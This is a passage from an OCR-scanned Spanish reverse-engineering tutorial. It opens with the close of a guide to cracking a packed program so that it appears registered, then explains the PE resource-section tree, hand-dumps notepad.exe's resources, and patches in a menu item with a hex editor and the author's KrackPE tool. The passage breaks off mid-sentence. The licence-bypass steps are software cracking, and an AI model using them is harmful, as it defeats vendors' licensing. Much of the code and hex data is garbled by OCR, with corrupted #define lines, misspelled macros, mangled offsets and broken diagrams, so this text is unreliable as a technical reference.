Son las instrucciones que entregan por vez primera el control al recorte. 


Con esto el programa casi parecerá registrado. Sólo queda colocar nuestro nombre de usuario y la 
clave en la subclave correspondiente del registro de Windows. ¿Cómo encontramos esa 
subclave? Podemos trazarla con una trampa en Soft Ice sobre la función RegQueryValueExA o 
con un monitor de las llamadas al registro de Windows como Registry Monitor de Mark 
Rusinovich. 


Yo encontré que era: 


HKCUNSoftwarelFMJ-SoftwarelWStarStridenl 


Hay que crear una clave llamada "Username" cuyo dato sería una cadena con el nombre del 
usuario. 


Para Terminar 


Bueno. Con esto termino esta serie en tres partes sobre desprotecciones de archivos PE 
empaquetados. Yo encuentro este último procedimiento más conveniente que el implementado 
con las DLEs para crackear archivos empaquetados. Pero en algunos respectos prácticos el 
método de las DLLs podría resultar más atractivo. 


Gracias a Iczelion - Stone - _mammon, por sus extraordinarios conocimientos y herramientas. 
Trato de pagar la deuda con ellos compartiendo libremente lo que he aprendido y cada día 
descubro. 


Comentarios y correcciones: nuMIT_orViname.com 


Mi página de programación: nuMIT_ors Programming Page 


Descabezando archivos ejecutables portables ( 
111) 


Sección de recursos .rsrc 


AUTOR: nuMIT or 

HERRAMIENTAS: o Hex Workshop u otro buen editor hexdecimal. 
o KrackPE 
o Snippet Creator v1.5 


Es un árbol 


La sección .rsrc contiene información sobre los recursos para un módulo. Esta sección organiza 
sus datos como un árbol de datos. 


Un árbol es una estructura de datos particular que constituye una especie particular de GRAFO. 


Un grafo es un conjunto de puntos (llamados VÉRTICES), donde cada punto está asociado a 
otros dos, que constituyen los vértices del primero, a través de líneas (llamadas BORDES). El 
grafo se emplea para representar estructuras de datos, es decir, un grafo puede concebirse como 
un tipo 

especial de variable muy empleado actualmente para la representación del conocimiento en 
Inteligencia Artificial . 


Para que un grafo sea un árbol debe cumplir las siguientes propiedades: 
1. Tener por lo menos un nodo principal llamado la raíz del árbol. 


2. Tener organizados los vértices en una jerarquía de niveles. De esta manera los nodos que no 
son raíces se dividen en m > 0, conjuntos disjuntos que a su vez son árboles denominados 
subárboles de la raiz. 


Tenemos entonces los siguientes conceptos: 
- Hoja: nodo o vértice terminal, que no contiene ningon subárbol. 
- Descendientes: nodos asociados a nodos no terminales. 


- Ascendiente o padre: nodo asociado a nodos descendentes. 

- Hermano: nodos asociados a un mismo padre. 

- Bosque: colección de más de un árbol. 

- Raiz: el onico nodo de un árbol que no posee padre. 

- Camino: enlace entre dos nodos consecutivos. 

- Rama: camino que termina en una hoja. 

- Nivel: número asociado a cada nodo, cuyo valor depende de la longitud del camino desde la raiz 
al nodo específico. 

- Altura o profundidad: número máximo de nodos de una rama; es decir, el nivel más alto de los 
nodos más uno. 

- Peso: número de nodos terminales. 


Ejemplo de un árbol: 
RAIZ 
IN 
N H 
EA 
N N 
EX EN 
NHH N 
E Ena 
H H H N 
IM 
H H 
N: Nodo 
H: Hoja 


Si se trata de una estructura de un solo campo, entonces es un árbol con un vértice o nodo pero 
sin bordes: H= N 


Un ejemplo de estructura en forma de árbol es la organización de la información en el disco duro 
en una jerarquía de raíz, diractorios, sudirectorios y archivos. Aquí los archivos serían las hojas 
del árbol, sus nodos terminales: 


(C): <- RATZ 

EN 
N  N<- Directorios 
EN, EN 


N HH N*<- Subdirectorios 1 
IN IN 
H H H N<- Subdirectorios 2 
TS 
H  H'<- Subdirectorios3 o Archivos 


La raíz y las ramas del árbol 


La raiz del directorio de recursos está ocupada por una estructura llamada 
IMAGE_RESOURCE_DIRECTORY (directorio de recursos). En lenguaje ensamblador: 


IMAGE_RESOURCE_DIRECTORY — struct 


Characteristics ULONG q 

TimeDateStamp ULONG ? 

MajorVersion ULONG ? 

MinorVersion ULONG ? 

NumberOfNamedEntries ULONG ? 

NumberOfIdEntries ULONG ? 
ends 


IMAGE_RESOURCE_DIRECTORY TYPEDEF PTR IMAGE_RESOURCE_DIRECTORY 


Los campos NumberOfNamedEntries y NumberOfIdEntries de esta estructura, cuando se 
trata de la raíz del árbol de recursos, dicen los tipos de recursos identificables por nombres o por 
IDs, respectivamente, que hay en el archivo. Me explico. 


Para ubicar los datos brutos que conforman cualquier recurso, entre todos los campos de la 
estructura IMAGE_RESOURCE_DIRECTORY los más importantes son 
NumberOfNamedEntries y NumberOfIdEntries. Cada uno de estos campos informa el 
número de ramas en las que se despliega la raíz del árbol. Es decir, el directorio de recursos 
informa, a través de los campos NumberOfNamedEntries y NumberOfIdEntries, el número 
de subdirectorios de recursos. Cada uno de estos subdirectorios puede ser considerado luego 
como 

la raiz de un subárbol de un "tipo de recurso". Después veremos estos subárboles. 


La estructura IMAGE_RESOURCE_DIRECTORY, que forma la raiz del árbol de recursos, es 
seguida de un arreglo (array) constituido por entradas de dos campos cada una. Llamamos este 
arreglo: IMAGE_RESOURCE_DIRECTORY_ENTRY, es decir, directorio de entradas de recursos. 
Cada entrada de este último directorio tiene la siguiente estructura: 


IMAGE_RESOURCE_DIRECTORY_ENTRY struct 


Name ULONG ? 
OffsetToData ULONG ? 
ends 


PIMAGE_RESOURCE_DIRECTORY_ENTRY TYOPEDEF PTR 
IMAGE_RESOURCE_DIRECTORY_ENTRY 


El campo NumberOfNameEntries de la estructura [IMAGE_RESOURCE_DIRECTORY, 
que como vimos es la raíz del árbol de recursos, contiene el número de entradas al comienzo del 
arreglo (array) del directorio de entradas (IMAGE_RESOURCE_DIRECTORY_ENTRY) que 
tienen las cadenas actuales asociadas con ellas. 


El campo NumberOfIdEntries de IMAGE_RESOURCE_DIRECTORY indica el número 
de entradas del arreglo del directorio de entradas con números enteros como identificadores 
(Ds). 


El campo Name de la estructura IMAGE_RESOURCE_DIRECTORY_ENTRY, 
correspondiente a una entrada del arreglo que sigue a la estructura 
IMAGE_RESOURCE_DIRECTORY, contiene un número entero que identifica un recurso. Si 
la entrada del directorio de recursos actual sigue a la raíz, el número entero del campo Name 
indica un tipo de recurso según las siguientes equivalencias, que indican los tipos básicos de 
recursos 

identificados en el archivo WINUSER.H: 


WINUSER.H 


ttdefine MAKEINTRESOURCEA(¡) (LPSTR) ((DWORD) ((WORD)() ) ) 
fidefine DIFFERENCE 11 


/* * Predefined Resource Types */ 

define RT_CURSOR MAKEINTRESOURCE(1) 
define RT_BITMAP MAKEINTRESOURCE(2) 
define RT_ICON MAKEINTRESOURCE(3) 
define RT_MENU MAKEINTRESOURCE(4) 
define RT_DIALOG MAKEINTRESOURCE(5) 
tdefine RT_STRING MAKEINTRESOURCE(6) 
define RT_FONTDIR MAKEINTRESOURCE(?7) 


fidefine RT_FONT MAKEINTRESOURCE(S) 

fidefine RT_ACCELERATOR MAKEINTRESOURCKE(9) 

fidefine RT_RCDATA MAKEINTRESOURCK(10) 

tidefine RT_MESSAGETABLE MAKEINTRESOURCE (11) 

fidefine RT_GROUP_CURSOR MAKEINTRESOURCE ((DWORD)RT_CURSOR + DIFFERENCE) 
fidefine RT_GROUP_ICON MAKEINTRESOURCE ((DWORD)RT_ICON + DIFFERENCE) 
fidefine RT_VERSION MAKEINTRESOURCE (16) 

fidefine RT_DLGINCLUDE MAKEINTRESOURCE (17) 

fidefine RT_PLUGPLA Y MAKEINTRESOURCE (19) 

fidefine RT_VXD MAKEINTRESOURCE (20) 

fidefine RT_ANICURSOR MAKEINTRESOURCE (21) 

fidefine RT_ANICON MAKEINTRESOURCE (22) 


En lenguaje ensamblador: 


MAKEINTRESOURCE macro i 


i typedef DWORD 


endm 

DIFFERENCE EQU 11 

RT_CURSOR EQU  MAKEINTRESOURCE 1 
RT_BITMAP EQU  MAKEINTRESOURCE 2 
RT_ICON EQU  MAKEINTRESOURSE 3 
RT_MENU EQU  MAKEINTRESOURSE 4 
RT_DIALOG EQU  MAKEINTRESOURSE 5 
RT_STRING EQU  MAKEINTRESOURSE 6 
RT_FONTDIR EQU  MAKEINTRESOURSE 7 
RT_FONT EQU  MAKEINTRESOURSE 8 
RT_ACCELERATOR EQU  MAKEINTRESOURSE 9 
RT_RCDATA EQU  MAKEINTRESOURSE 10 


RT_MESSAGETABLE EQU  MAKEINTRESOURSE 11 


RT GROUP_CURSOR EQU MAKEINTRESOURSE RT_CURSOR + 


DIFFERENCE 
, MAKEINTRESOURSE RT_ICON + 
RT_GROUP_ICON EQU DIFFERENCE 
RT_VERSION EQU  MAKEINTRESOURSE 16 


RT_DLGINCLUDE EQU  MAKEINTRESOURSE 17 
RT_PLUGPLAY EQU  MAKEINTRESOURSE 19 


RT_VXD EQU  MAKEINTRESOURSE 20 
RT_ANICURSOR EQU  MAKEINTRESOURSE 21 
RT_ANIICON EQU  MAKEINTRESOURSE 22 


Como ya se ha dicho, la raiz del árbol de recursos, el primer directorio, es seguida por un arreglo 
(array) que tiene una entrada para cada tipo de recurso que contiene el archivo, no importa 
cuántos tipos. Cada entrada del arreglo que sigue a la raíz del directorio de recursos sería una 
rama principal del árbol. 


En el nivel más alto del árbol, los valores MAKEINTRESOURCE de la lista de arriba, son 
colocados en el campo Name de cada entrada del arreglo que constituye las entradas del 
directorio de recursos, identificando los diferentes recursos por tipo. 


El campo OffsetToData de IMAGE_RESOURCE_DIRECTORY_ENTRY, contiene un 
desplazamiento respecto al comienzo de la sección de recursos (que también es el inicio del 
directorio de recursos) donde se encuentra un subdirectorio de recursos o ya los datos brutos que 
forman un recurso. 


-Cómo saber si el campo OffsetToData de una entrada del directorio de entradas apunta a un 
subdirectorio o a datos brutos? Esto lo señala el bit más alto (el bit 31) del campo de 32 bits que 
forma el campo OffsetToData. Por ejemplo, si el valor de este campo es 8000 0101h, 

entonces el campo apunta al desplazamiento 0101h, respecto del comienzo de la sección de 
recursos y, como el bit más alto es 1 (3000h), apunta a un subdirectorio. Si el valor fuera 0000 
0101h, el campo no apuntaría a un subdirectorio de recursos sino a una estructura 
IMAGE_RESOURCE_DATA_ENTRY con información sobre la ubicación exacta de los datos 
brutos que forman un recurso del archivo PE. 


Cada una de las entradas en el directorio de entradas raíz generalmente se puede considerar como 
el "vértice" que apunta a un nodo en el segundo nivel del árbol. Estos nodos son como 
subdirectorios del árbol de recursos. También estos nodos, que llamamos subdirectorios de 
recursos, tienen estructura IMAGE_RESOURCE_DIRECTORY con sus propias entradas cada 
uno. En este segundo nivel, los directorios son usados para identificar el nombre o ID de cada 
recurso para un tipo de recurso dado. Si se tuvieran múltiples menúes definidos en la aplicación, 
habría una entrada para cada uno aquí en el segundo nivel del árbol. 


LAS HOJAS 


Si el campo OffsetToData apunta a un nodo terminal u hoja, entonces este nodo terminal tiene la 


siguiente estructura: 


IMAGE_RESOURCE_DATA_ENTRY struct 


OffsetToData ULONG q 

Size ULONG he 

CodePage ULONG ? 

Reserved ULONG ds 
ends 


PIMAGE_RESOURCE_DATA_ENTRY TYPEDEF PTR IMAGE_RESOURCE_DATA_ENTRY 


El campo OffsetToData indica la dirección virtual del desplazamiento desde la base de la 
imagen donde están los datos brutos que conforman el recurso y el campo Size el tamaño de los 
datos actuales del recurso. 


Puesto que esta información es usada por funciones una vez que la aplicación ha sido cargada, 
tiene más sentido hacer que el campo OffsetToData sea una dirección virtual relativa, lo cual es 
el caso. Los demás desplazamientos, tales como punteros desde las entradas a otros directorios, 
son 

desplazamientos relativos a la localización del nodo raiz. 


Si el recurso es una cadena de caracteres, entonces esta cadena está en formato UNICODE y 
tiene la estructura: 


WINNT.H 


typedef struct _IMAGE_RESOURCE_DIR_STRING_U 


( 
USHORT Length; 
WCHAR  NamesStringl 1 ]; 


J 
IMAGE_RESOURCE_DIR_STRING_U, *PIMAGE_RESOURCE_DIR_STRING_U'; 


En lenguaje ensamblador: 


IMAGE_RESOURCE_DIR_STRING_U struct 


Name DW ? 
OffsetToData DW ? 
ends 


Los recursos tipo cadenas son almacenados después del Directorio de Entradas del Recurso e 
inmediatamente antes del primer objeto de datos del recurso. La longitud necesita ser alineada en 
el límite de un dato WORD. 


Debajo de este nivel de la jerarquía de subdirectorios, el árbol de recursos ya no tiene más ramas. 


Resumiendo 


Navegar por la jerarquía del directorio de recursos es como navegar por un disco duro. Hay un 
directorio maestro (el directorio raiz), el cual tiene subdirectorios. Los subdirectorios tiene sus 
propios subdirectorios que poueden apuntar a los datos de recursos brutos para cosas como 
plantillas de diálogo. 


En el formato PE, el directorio raiz de la jerarquía del directorio de recursos y de todos sus 
directorios son estructuras del tipo IMAGE_RESOURCE_DIRECTORY. El campo 
NumberOfNamedEntries y el campo NumberOfIdEntries de la estructura 
IMAGE_RESOURCE_DIRECTORY que forma la raíz del árbol de recursos indican el 
número de entradas que conforman un arreglo que sigue inmediatamente después de la raíz. Cada 
entrada de este arreglo tiene la estructura IMAGE_RESOURCE_DIRECTORY_ENTRY. 


Cada entrada del arreglo raíz del árbol de recursos tiene dos campos. El campo Name de la 
estructura IMAGE_RESOURCE_DIRECTORY_ENTRY, indica un tipo de recurso segon las 
equivalencias, que indican los tipos básicos de recursos identificados en el archivo 
WINUSER.H. 


El campo OffsetToData de IMAGE_RESOURCE_DIRECTORY_ENTRY, contiene un 
desplazamiento respecto al comienzo de la sección de recursos (que también es el inicio del 
directorio de recursos) donde se encuentra un subdirectorio de recursos o ya los datos brutos que 
forman un recurso. Para saber si se trata de un subdirectorio más o de los datos brutos del 
recurso, hay que veriricar si este valor tiene la forma 8xxx xxxx h; un 8 en el comienzo de este 
valor indica que el bit 31 de la expresión es 1 y que el campo apunta a un subdirectorio; si no es 
8, entonces 

apunta ya a los datos brutos del recurso. 


Los subdiectorios o nodos del árbol de recurso tienen la misma estructura que la raíz, es decir, 


IMAGE_RESOURCE_DIRECTORY y también son seguidos de un arreglo del tipo 
IMAGE_RESOURCE_DIRECTORY_ENTRY. La diferencia, es que los subdirectorios ya no 
tratan de tipos de recursos sino del número de recursos de un mismo tipo en el archivo 

PE. Entonces, los campos del arreglo IMAGE_RESOURCE_DIRECTORY_ENTRY 

que sigue a cada subdirectorio de recursos, identifican los recursos particulares de un mismo tipo 
y señalan dónde se ubican. 


Cuando el valor del campo OffsetToData de una entrada con la estructura 
IMAGE_RESOURCE_DIRECTORY_ENTRY no comienza con un $, entonces apunta 

a un nodo terminal u hoja del árbol de recursos. Si este nodo terminal no es un recurso tipo 
cadena, entonces tiene estructura I[MAGE_RESOURCE_DATA_ENTRY. Los dos primeros 
campos de esta estructura, OffsetToData y Size, señalan respectivamente la ubicación (desde la 
base de la imagen) y tamaño (en bytes) del recurso. 


Si el campo OffsetToData de una entrada IMAGE_RESOURCE_DIRECTORY_ ENTRY 
apunta a un nodo terminal de tipo cadena, entonces este nodo terminal tiene la forma 
IMAGE_RESOURCE_DIR_STRING_U. 


A continuación muestro el volcado que hice manualmente del árbol de recursos del archivo 
notepad.exe que viene como ejemplo junto con este trabajo. 


He colocado los enlaces (links) que corresponden a cada puntero en los campos pertinentes para 
que pueda seguirse con comodidad. 


Recomiendo que sean verificados los campos abriendo una vista de notepad.exe con un editor 
hexadecimal. 


Ubicación de la sección de recursos: 


Antes que nada hay que averiguar dónde está la sección de recursos. Una manera intuitiva de 
hacerlo es abrir el target con un editor hexadecimal. Luego emprender una bosqueda de la cadena 
".rsrc". Con HexWorkshop el comando es "Edit/Fin", se coloca ".rsrc" en la ventana "Find" y se 
presiona el botón "Find Next". Donde el editor se detenga, ahí inicia la entrada, en el directorio 
de secciones del archivo PE, con información correspondiente a la sección de recursos. 


El editor se detendrá en el desplazamiento 0218h. Es el comienzo de la tabla de sección que 
corresponde al árbol de recursos. Esta entrada tiene la estructura. 


_IMAGE_SECTION_HEADER struct 


Cadena con el nombre de la 


Name DB8DUP. (?); 


sección 
VirtualSize DD ds 
VirtualA ddress DD ? 
Size OfRawData DD ? 
PointerToRawData DD ES 
NumberOfIdEntries DD ? 
PointerToRelocations DD Es 
PointerToLinenumbers DD da 
NumberOfRelocations DW ES 
NumberOfLinenumbers DW ? 
Characteristics DD ES 
ends 


El campo PointerToRawData indica el desplazamiento del archivo donde comienza la sección 
de recursos. Ese campo está en 0218h (inicio de la estructura) + 14h bytes = 022Ch. El contenido 
de este campo es 0000 5000 h (invertido). 


En notepad.exe, la entrada de la sección de recursos, en el directorio de datos del archivo, 
empieza en 0218h. La información correspondiente al campo PointerToRawData de esta 
entrada estariá en 0218h + 14h = 022Ch, cuyo valor es 0000 5000 h. Entonces, la sección de 
recursos .rsrc de notepad.exe está en el desplazamiento 0000 5000 h. 


A partir de aquí, considerando que esta sección comienza con el directorio raiz del árbol de 
recursos; que este directorio tiene la estructura IMAGE_RESOURCE_DIRECTORY,; y que 
este directorio es seguido por un arreglo de entradas con la estructura 
IMAGE_RESOURCE_DIRECTORY_ENTRY,; considerando todo esto podemos ya volcar 
manualmente el árbol de recursos del archivo. Es engorroso hacerlo y puede parecer inecesario, 
pero si lo hacemos al menos una vez, podemos estar seguro que podremos hacer un programa que 
lo haga por nosotros o que podemos ubicar ciertos datos que nos interesen y alterarlos 
manualmente cuándo y cómo se nos antoje. 


A continuación el volcado. 


desplazamiento 0000 5000h 


Desplazamiento 


5000 
5010 
5018 
5020 
5028 
5030 
5038 
5040 


5048 
5058 
5060 
5068 
5070 


5078 
5088 


5090 
50A0 
50AS 


50B0 
50C0 
50C8 
50D0 
50D8 


Datos 


00000000 
00000003 
00000004 
00000005 
00000006 
00000009 
0000000E 
00000010 


00000000 
00000001 
00000002 
00000003 
00000004 


00000000 
00000001 


00000000 
00000004 
00000004 


00000000 
00000001 
00000002 
00000003 
00000004 


00000000 
80000048 
80000078 
80000090 
800000B0 
800000E0 
80000100 
80000120 


00000000 
80000138 
80000150 
80000168 
80000180 


00000000 
80000198 


00000000 
800001B0 
$00001C8 


00000000 
S00001E0 
800001E8 
80000201 
80000228 


00000000 00070000 (7 tipos de datos) 
(Tipo 3 (icono), en 50004+48h) 

(Tipo 4 (menú), en 50004+78h) 

(Tipo 5 (diálogo), en 5000+90h) 

(Tipo 6 (cadena), en 5000+0B0h) 

(Tipo 9 (acelerador), en 5000+0E0h) 

(Tipo OEh (icono de grupo), en 5000+100h) 
(Tipo 10h (info de versión), en 5000+120h) 


00000000 00040000 (4 iconos) 
(Nombre ID 1, en 5000+0138h) 
(Nombre ID 2, en 5000+0150h) 
(Nombre ID 3, en 5000+0168h)) 
(Nombre ID 4, en 5000+0180h) 


00000000 00010000 (1 menú) 
(Nombre ID 1, en 5000+0198h) 


00000000 00020000 (Q diálogos) 
(Nombre ID 0Ch, en 5000+01B0h) 


(Nombre ID 0Eh, en 5000+01C8h) 


00000000 00040000 (4 cadenas) 
(Nombre ID 1, en 5000+01E0h) 


(Nombre ID 2, en 5000+01E8h) 
(Nombre ID 3, en 5000+0210h) 
(Nombre ID 4, en 5000+0228h) 


50E0 
50F0 
50F8 


5100 
5110 
5118 


5120 
5130 


5138 
5148 


5150 
5160 


5168 
5178 


5180 
5190 


5198 
51AS8 


51B0 
51C0 


51C8 
51D8 


51E0 


00000000 
00000001 
00000002 


00000000 
00000001 
00000002 


00000000 
00000001 


000000000 
00000040A 


000000000 
00000040A 


000000000 
00000040A 


000000000 
000000404 


000000000 
00000040A 


000000000 
00000040A 


000000000 
00000040A 


00000000 


00000000 
80000240 
80000248 


00000000 
80000270 
80000280 


00000000 
800002A0 


000000000 
000002B8 


000000000 
000002C8 


000000000 
000002D8 


000000000 
000002E8 


000000000 
000002F8 


000000000 
00000308 


000000000 
00000318 


00000000 


00000000 00040000 (Q tablas de acelers.) 
(Nombre ID 1, en 5000+0240h) 


(Nombre ID 2, en 5000+0248h) 
00000000 00040000 (Q entradas) 
(Nombre ID 1, en 5000+0270h) 


(Nombre ID 2, en 5000+0280h) 


00000000 00010000 (1 entrada) 
(Nombre ID 1, en 5000+02A 0h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+02B8h). 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+02C8h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+02D8h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+02E8h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 53000+02F8h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+0308h) 


00000000 00010000 (1 entrada) 
(Nombre ID 040Ah, en 5000+0318h) 


00000000 00010000 (1 entrada) 


51F0 00000040A 00000328 (Nombre ID 040Ah, en 5000+0328h) 
51E8 00000000 00000000 00000000 00010000 (1 entrada) 
5208 00000040A 00000338 (Nombre ID 040Ah, en 5000+0338h) 
5210 000000000 000000000 00000000 00010000 (1 entrada) 
5220 00000040A 00000348 (Nombre ID 040Ah, en 5000+0348h) 
5228 000000000 000000000 00000000 00010000 (1 entrada) 
5238 00000040A 00000358 (Nombre ID 040Ah, en 5000+0358h) 
5240 000000000 000000000 00000000 00010000 (1 entrada) 
5248 00000040A 00000368 (Nombre ID 040Ah, en 5000+0368h) 
5258 000000000 000000000 00000000 00010000 (1 entrada) 
5268 00000040A 00000378 (Nombre ID 040Ah, en 5000+0378h) 
5270 000000000 000000000 00000000 00010000 (1 entrada) 
5280 00000040A 00000388 (Nombre ID 040Ah, en 5000+0388h) 
5288 000000000 000000000 00000000 00010000 (1 entrada) 
5298 00000040A 00000398 (Nombre ID 040Ah, en 5000+0398h) 
52A0 000000000 000000000 00000000 00010000 (1 entrada) 
52B0 00000040A 000003A8 (Nombre ID 040Ah, en 5000+03A8h) 


* Aquí indica el desplazamiento desde ImageBase donde está el icono 1 


52B8 000083B8 Desp (VO) 83B8h, Tipo 3, NombrelD 1, LenglID 0 
00000128 Tamaño: 0128h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el 2 

5208 000084E0 Desp (VO) 84E0h, Tipo 3, NombrelD 2, LenglID 0 
000002E8 Tamaño: 02E8h bytes 
000004E4 


00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el icono 3 
52D8 000087C8 Desp (VO) 87C8h, Tipo 3, NombrelD 3, LengID 0 
000002E8 Tamaño: 02E8h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el icono 4 
52E8 0000SAB0 Desp (VO) 8AB0h, Tipo 3, NombrelD 4, LenglID 0 
00000128 Tamaño: 0128h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el menú 
52F8 00008BDS Desp (VO) 8BD8h, Tipo 4, NombrelD 1, LengID 0 
000002F0 Tamaño: 02F0h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el diálogo 0Ch 
5308 00008ECS8 Desp (VO) SEC8h, Tipo 5, NombrelID 0Ch, LengID 0 
000000B8 Tamaño: 0B8h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el diálogo O0Eh 
5318 00008E80 Desp (VO) 8F80h, Tipo 5, NombrelD 0Eh, Lengl 
000002E8 Tamaño: 02E8h bytes 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde están cadenas 
5328 00009418 Desp (VO) 9418h, Tipo 6, NombrelD 0Eh, Lengl 
00000258 Tamaño: 
000004E4 
00000000 


5338 00009670 
00000BBC Tamaño: 
000004E4 
00000000 


5348 0000A22C 
000002EC Tamaño: 
000004E4 
00000000 


5358 0000A518 
00000628 Tamaño: 
000004E4 
00000000 


* Desplazamiento de la tabla de aceleradores 1 

5368 0000AB40 Desp (VO) AB40h, Tipo 9, NombrelD 01, LengID 0 
00000068 Tamaño: 
000004E4 
00000000 


* Desplazamiento de la tabla de aceleradores 2 

5378 0000AB88 Desp (VO) AB40h, Tipo 9, NombrelD 01, LenglID 0 
00000022 Tamaño: 
000004E4 
00000000 


* Desplazamiento del icono de grupo 

5388 0000ABF0 Desp (VO) ABFO0h, Tipo 0Eh, NombrelD 01, LengID 0 
00000022 Tamaño: 
000004E4 
00000000 


* Aquí indica el desplazamiento desde ImageBase donde está el 

5398 0000AC14 Desp (VO) ACI14h, Tipo 0Eh, NombrelD 01, LengID 0 
000002ES8 Tamaño: 
000004E4 
00000000 


* Desplazamiento desde ImageBase donde está la información de la versión 
53A8 000084E0 Desp (VO) 84E0h, Tipo 10h, NombrelID 01, LengID 0 
000002E8 Tamaño: 
000004E4 
00000000 


Desplazamiento desde ImageBase donde está la información de la versión 
53B8 000084E0 Desp (VO) 84E0h, Tipo 10h, NombrelD 01, LengID 0 
000002ES8 Tamaño: 
000004E4 
00000000 


Campos del encabezado de un archivo .ico 

ico 1: 

53B8 00000028 
00000010 
00000020 
0001 
0004 
00000000 
00000080 
00000000 
00000000 
00000000 
00000000 


Ico 2: 

54E0 00000028 
00000020 
00000040 
0001 
0004 
00000000 
00000020 
00000000 
00000000 
00000000 
00000000 


menu: 
5BD8 00000000 
0010 N”* de caracteres: 10h = 16d 


diálogo 0Ch: 
5ECS8 90C800C0 
00000000 


diálogo 0Eh: 


5FS0 90C820C4 
00000000 
cadena 1: 
6418 0000005A N* de caracteres: 


acelerador 1: 

7B40 0009 
002D 
00000301 


acelerador 2: 

7B88 0009 
002D 
00000301 


HHHHHRRRRARA RARA HA HHRHHHHR HH HH RR RRHH HAHAHA HR HHHRHHRHR RRHH RRA HA HARRRHHHHHHHHHHH 
Volcar recursos. 


Con estos datos podríamos volcar cualquier recurso que nos interese de notepad.exe. Una manera 
de hacerlo, es desplegar notepad.exe en Softlce y, si se cuenta con IceDump, volcar los datos que 
conforman un recurso al disco duro. 


Para facilitar esto, he escrito una pequeña utilidad que permite extraer de archivos PE datos con 
un tamaño indicado, desde un desplazamiento específico. Lo he llamado KrackPE, la primera 


parte de un ambiente para parchar archivos PE y volcar su contenido. 


Bien. Abramos notepad.exe con KrackPE (File/Open File o Select a file). Ahora indicamos en el 
campo Offset = 53B8, que es el desplazamiento donde hemos localizado el icono 1 de notepad. 
En el campo Size colocaremos 0128, el tamaño del ícono. Luego pulsamos Save as, elegimos un 
nombre como npl.ico y guardamos en disco duro. 


Hay programas que hacen esto de manera más sencilla. Pero KrackPE es una herramienta que nos 
permite extraer otros datos binarios que especifiquemos, siempre que tengamos su 
desplazamiento y 

su tamaño. Además, como muchas de las direcciones que obtenemos no son desplazamientos 
sino direcciones virtuales, he agregado un comando que permite convertir un tipo de valor en 
Otro, y viceversa. 


Aún no estoy conforme con esta herramienta. Pronto agregaré funciones importantes. Entre ellas, 
algunas que he implementado en otros programas. 


Podemos seguir con el procedimiento empleado y seguir volcando los demás iconos, ya que 
notepad tiene cuatro iconos, como nos informa el desplazamiento 5048h. 


Agregar un item al menú 


Vamos a volcar ahora el menú. Siguiendo los enlaces desde el desplazamiento 5048h (el 
subdirectorio con información sobre los menúes en notepad) llegamos hasta el desplazamiento 
SBD8h, donde está la data que forma el menú. El desplazamiento 52F8h está ocupado por una 
estructura IMAGE_RESOURCE_DATA_ENTRY que apunta al nodo terminal, la hoja 
ocupada por los datos del menú, en la dirección virtual relativa (RVA) 8BD8h. El 
desplazamiento 52FCh corresponde al campo Size de esta estructura, indica el espacio ocupado 
por la data que corresponde al menú: 02F0h = 652 bytes. 


Volquemos el menú a disco duro. Para ello necesitamos el desplazamiento donde se encuentra. 
Sabemos su dirección virtual relativa (RVA = 8BD8h). Para hallar el desplazamiento con 
KrackPE necesitamos la dirección virtual absoluta: ImageBase + RVA = 400000 + 8BD8h = 
408BD8h. Ahora, en KrackPE, escribimos en el campo Virtual Address de la izquierda 
408BD8A, y pulsamos el botón GetOffset. Ya tenemos el desplazamiento en el campo GetOffset 
de la izquierda; ahí se encuentra el menú de notepad.exe.Tenemos ahora Offset = 5BD$8, y 
ponemos Snippet Size = 02F0. Volcamos el recorte a disco duro pulsando el botón Save as. 
Llamémosle al volcado "mnp.bin". Abrámosle con Hexworkshop. Lo que vemos en la ventana 
de Hexworkshop es una vista de la data que forma el menú de notepad.exe. 


Vamos a agregar un item al final del menú. Agregaremos un item que diga "Explorar". Para ello 
debemos aumentar el tamaño de mnp.bin. En la vista que nos muestra Hexworkshop de mnp.bin, 
ponemos el cursor al final del archivo y ejecutamos el comando Edit / Insert; colocamos en el 
campo "Number of bytes" 48, así que cuando pulsemos OK mnp.bin aumentará 48 bytes. Yo 
pongo 48, pero pueden ser menos o más. 


En el desplazamiento 027C, que contiene 9000h (fin del menú), cambiémosle por 1000h 
(MENUITEM). 


En el desplazamiento 02ECh, escribamos 8000h. Inmediatamente después, en 02EEh, escribimos 
el identificador de item: CC. Luego en el desplazamiento 02F0h escribiremos en formato unicode 


Egxplorar 
El formato unicode separa cada caracter por un cero: 
45 00 26 00 78 00 70 00 6C 00 6F 00 72 00 61 00 72 00 00 00 
E a X p l 0 r a r 
Los últimos cuatro ceros son importantes, porque señalan el final de la cadena. 


Ahora el tamaño del menú es 0304h. Así que eliminemos los bytes que nos sobran: marcamos 
desde 0304h (= 768 bytes) hasta 0338h y pulsamos la tecla delete. Guardamos (File 1 Save), 
seleccionamos todo (Edit / Select All) y copiamos (CTRL+C). 


Ahora buscamos un espacio vacío en notepad para el recorte. Para esto basta sólo pulsar el botón 
Get greatest space de KrackPe. Encontramos que en el desplazamiento 4016h hay un espacio de 
O1EAh = 490 bytes. la VA correspondiente a este desplazamiento es : 406216h. 
Lamentablemente, este espacio es menor que el requerido, ya que el menú es de 768 bytes. 


Lo que podemos hacer entonces es colocar el nuevo menú al final del archivo. Revisemos el final 
de notepad.exe con Hexworkshop. Hay también un espacio amplio, aunque todavía más pequeño 
que nuestro menú. Así que agreguemos 500 bytes: Edit / Insert, en Hexworkshop; colocamos en 
el campo "Number of bytes" 500; marcamos toda el area libre desde el desplazamiento 8810h, 
pegamos el menú (CTRL+V) y salvamos con respaldo. 


Hemos pegado nuestro menú en 8810h. KrackPE nos dice que la dirección virtual que 
corresponde a este desplazameinto es 0040B810h. 


Ahora, en el desplazamiento 52F8h, que contiene la dirección virtual (VA) donde se encuentra el 
